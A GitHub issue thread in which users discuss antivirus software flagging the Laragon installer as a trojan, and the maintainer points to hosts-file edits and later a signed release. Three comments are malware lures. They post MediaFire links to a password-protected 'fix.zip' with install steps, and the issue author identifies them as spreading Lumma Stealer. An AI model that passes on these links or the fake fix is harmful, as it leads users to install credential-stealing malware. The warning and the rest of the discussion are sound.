### ISSUE TITLE
Total Virus accuses Trojan.Malware in Laragon

### ISSUE THREAD

**Issue by iury89** [leokhoa/laragon#858]
I would really like to use Laragon to replace Xampp but unfortunately both the portable version and the full installation are showing viruses, all the exe files are reporting viruses and my antivirus won't let them install, I know it could be a false positive, but please resolve it This Laragon is wonderful and you did an incredible job, but you need to release a new version that is 100% safe and without false positives

![image](https://github.com/user-attachments/assets/c0f7542b-221a-456f-91d3-7107b641e15d)

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by iury89** [comment]
Be careful, they are using the comments to spread Lumma Stealer through email notifications with a false solution to this problem, the correct thing would be for @leokhoa to solve this problem and finally have a safe solution, create a link for donations or a paid pro version so that we can pose to help. 
 
but github deleted it, be careful more information >> 
https://www.techradar.com/pro/security/lumma-stealer-malware-linked-as-project-fixes-in-github-comments

**Comment by leokhoa** [comment]
@iury89 : 
I’m not sure why, but it might be because the auto-virtual host feature modifies the Windows system hosts file.

**Comment by iury89** [comment]
Thank you very much for the answer, if possible create a version without this feature presented to us so that they are not blocked by antivirus and make a txt with the entries in the hosts, so that you can finally install laragon without blocks, if you can do it at least in the portable version It would help a lot.

**Comment by alxndr-w** [comment]
@iury89 or you could just uninstall your snake-oil anti-virus software and stay with Microsoft Defender.

Of course, software that is meant for developing may has to change your system, like the hosts file. That is something, laragon does and your anti-virus software wants to protect you from this in general.

So instead "fixing" laragon, just fix your choice of anti-virus software or treat the warning is what it is: a false-positive.

**Comment by Sophist-UK** [comment]
Just because an anti-virus product flags changing a host file does not make it "snake-oil" - personally I would want my AV to flag a host file change because it is definitely something that malware might want to do.

But as @alxndr-w says, you can tell your AV that this is OK for Laragon.

**Comment by alxndr-w** [comment]
@Sophist-UK sure. But Windows or any modern OS in 2024 already prevent such things and 3rd-party AV-software can in fact be a security hole by itself.

In this case, Laragon in fact triggers User Account Control and kindly asks for the hosts file write access.

**Comment by iury89** [comment]
Thank you very much for the answers, but even though it's a false positive, I'm not going to disable my antivirus, I ended up choosing to go back to xampp, as I said, the ideal would be to create a lite version without changing the hosts or anything that bothers the antivirus, and leaving for the user to have a safe option to install on their machine, in my opinion this is hindering the growth of laragon, because xampp is much worse than Laragon, but at least it seems safe and reliable.

**Comment by Sophist-UK** [comment]
@alxndr-w said:
> In this case, Laragon in fact triggers User Account Control and kindly asks for the hosts file write access.

Actually, saying yes to User Account Control authorises that executable to do a whole bunch of things other than just changing the Hosts file. One of the things that decent AV/firewall software provides is fine-grained access control which allows access to Hosts but avoids access to other things. 

Or you can simply assign more generous security privileges to the Hosts file to allow Laragon to change it.

**Comment by leokhoa** [comment]
Laragon 8.0.0 has a digital signature, identified that it is created by me. It should fix the false positive issue.  https://github.com/leokhoa/laragon/discussions/1058
https://github.com/leokhoa/laragon/releases/tag/8.0.0

**Comment by albanx** [comment]
![Image](https://github.com/user-attachments/assets/7393acc8-30b3-4fd6-ad6a-e713e4891282)

**Comment by Timmy-the-nobody** [comment]
> Laragon 8.0.0 has a digital signature, identified that it is created by me. It should fix the false positive issue. [#1058](https://github.com/leokhoa/laragon/discussions/1058) https://github.com/leokhoa/laragon/releases/tag/8.0.0

Hi, 8.2.3 is still flaged by windows defender
